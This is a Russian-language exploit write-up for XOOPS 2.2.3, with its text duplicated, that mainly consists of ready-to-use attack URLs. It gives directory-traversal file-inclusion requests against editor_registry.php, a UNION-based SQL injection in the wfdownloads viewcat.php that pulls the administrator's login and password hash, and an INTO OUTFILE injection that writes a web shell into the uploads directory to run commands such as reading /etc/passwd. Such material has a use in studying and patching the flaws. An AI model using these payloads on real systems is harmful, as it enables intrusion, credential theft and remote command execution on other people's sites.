Множественные уязвимости в XOOPS 2.2.3
Возможность просматривать проивзольные файлы на целевой системе, и подключать на исполнение сценарии на php (без специфичекого расширения).
Примеры:
Возможна SQL-инъекция в скрипте viewcat.php, если опция magic_quotes_gpc выключена. Вы можете просмотреть MD5 хэш пароля администратора.
Пример:
Также, возможно создать web-shell скрипт, в директорию доступную для записи (в примере это директория "uploads").
Пример:
Затем выполнять произвольные комманды:
http://[target]/[path_to_xoops]/uploads/shell.php?cmd=cat%20/etc/passwd
Сплойт
Возможность просматривать проивзольные файлы на целевой системе, и подключать на исполнение сценарии на php (без специфичекого расширения).
Примеры:
Код:
http://[target]/[path_to_xoops]/class/xoopseditor/textarea/editor_registry.php?
xoopsConfig[language]=../../../../../../../../../../script
http://[target]/[path_to_xoops]/class/xoopseditor/textarea/editor_registry.php?
xoopsConfig[language]=../../../../../../../../../../boot.ini%00
http://[target]/[path_to_xoops]/class/xoopseditor/koivi/editor_registry.php?
xoopsConfig[language]=../../../../../../../../../../script
http://[target]/[path_to_xoops]/class/xoopseditor/koivi/editor_registry.php?
xoopsConfig[language]=../../../../../../../../../../boot.ini%00
http://[target]/[path_to_xoops]/class/xoopseditor/dhtmltextarea/editor_registry.php?
xoopsConfig[language]=../../../../../../../../../../script
http://[target]/[path_to_xoops]/class/xoopseditor/dhtmltextarea/editor_registry.php?
xoopsConfig[language]=../../../../../../../../../../boot.ini%00
Возможна SQL-инъекция в скрипте viewcat.php, если опция magic_quotes_gpc выключена. Вы можете просмотреть MD5 хэш пароля администратора.
Пример:
Код:
http://[target]/[path_to_xoops]/modules/wfdownloads/
viewcat.php?list=-'%20UNION%20SELECT%200,0,loginname,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,pass,0,0%20FROM%20fXZtr_users%20WHERE%20level=5/*
Также, возможно создать web-shell скрипт, в директорию доступную для записи (в примере это директория "uploads").
Пример:
Код:
http://[target]/[path_to_xoops]/modules/wfdownloads/
viewcat.php?list=-1'%20or'a'='a'%20UNION%20SELECT%200,0,0,'',
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20INTO%20OUTFILE%20'../../www/
xoops/uploads/shell.php'%20FROM%20fXZtr_wfdownloads_downloads/*
Затем выполнять произвольные комманды:
http://[target]/[path_to_xoops]/uploads/shell.php?cmd=cat%20/etc/passwd
Сплойт